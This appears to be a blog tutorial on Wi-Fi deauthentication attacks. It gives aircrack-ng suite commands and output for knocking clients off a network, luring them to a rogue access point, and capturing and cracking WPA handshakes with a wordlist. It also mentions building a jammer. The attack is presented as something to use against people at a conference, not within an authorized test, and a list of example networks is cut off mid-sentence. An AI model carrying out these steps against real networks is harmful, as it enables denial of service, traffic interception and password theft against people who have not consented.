Deauthing Wireless Clients

This year at DEFCON, the Hak5 WiFi Pineapples sold out within the first day. I noticed quite a few people walking around with their Pineapples on in Vegas and I’m sure a few of them were having some luck, but they only work against people attempting to connect to a network, not those who are already connected. So what if we could force those people already connected to drop the connection and try to reconnect? That’s where a deauth attack is valuable. By deauthenticating the clients and forcing them to reconnect, we can do three things:

  1. Denial of service.
  2. Redirect to our rogue access point (Pineapple, PwnPlug, SILICA, etc.).
  3. Capture the WPA handshake and attempt to crack the  password.

Actually doing a deauth attack is really simple. I have a cheap laptop with Kali running on it and an Alfa card setup and this works perfectly. The first thing to do is to set up an interface in monitoring mode using airmon.

airmon-ng start wlan1

This creates the mon0 interface that we’ll use throughout the rest of the attack.

Next we need to grab some information about the target network. Do this with airodump

airodump-ng mon0

Grab the BSSID and channel number of the target network. Change your interface over to the channel of the target

iwconfig mon0 channel X

and we’ll be ready to start the attack.

To begin deauthing clients, we’ll need to use aireplay. The syntax is:

aireplay-ng -0 0 -a 00:00:00:00:00:00 mon0

When you run this, it will send out deauthentication packets to the network, knocking off clients until you stop it.

root@kali:~# aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX mon0
11:37:23  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel X
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
12:37:23  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:23  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:24  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:24  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:25  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:25  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:26  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:26  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:27  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:27  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
12:37:27  Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]

Now the challenge is redirecting those deauthenticated clients to your access point. To do this, have your Pineapple with you and running, or set up another device with the SSID of the target network (assuming you can get your signal stronger than the existing access point) or to the SSID of a common network such as:

Another option is to capture the WPA/2 handshake with the client reconnects. You can use this to attack the password of the AP in order to get a foothold in the network. To do this, in another terminal have this command typed and ready to go:

airodump-ng mon0 --bssid XX:XX:XX:XX:XX:XX --channel X --write WPAhandshake

As soon as you stop sending deauth packets, run that command and wait for the top to have the “WPA handshake: XX:XX:XX:XX:XX:XX” value. From there, run aircrack with your wordlist of choice to attemp to crack the password.

aircrack-ng WPAhandshake.cap -w /usr/share/wordlists/fern-wifi/common.txt

Finally, a different way of using this attack is to create a jammer. Note that any kind of jammer in the United States is absolutely illegal, so don’t do this. I stumbled across this project which essentially does the same thing as aireplay, but against all APs running on a given channel. I have not tested this so I can not verify that it actually works, however to concept is valid.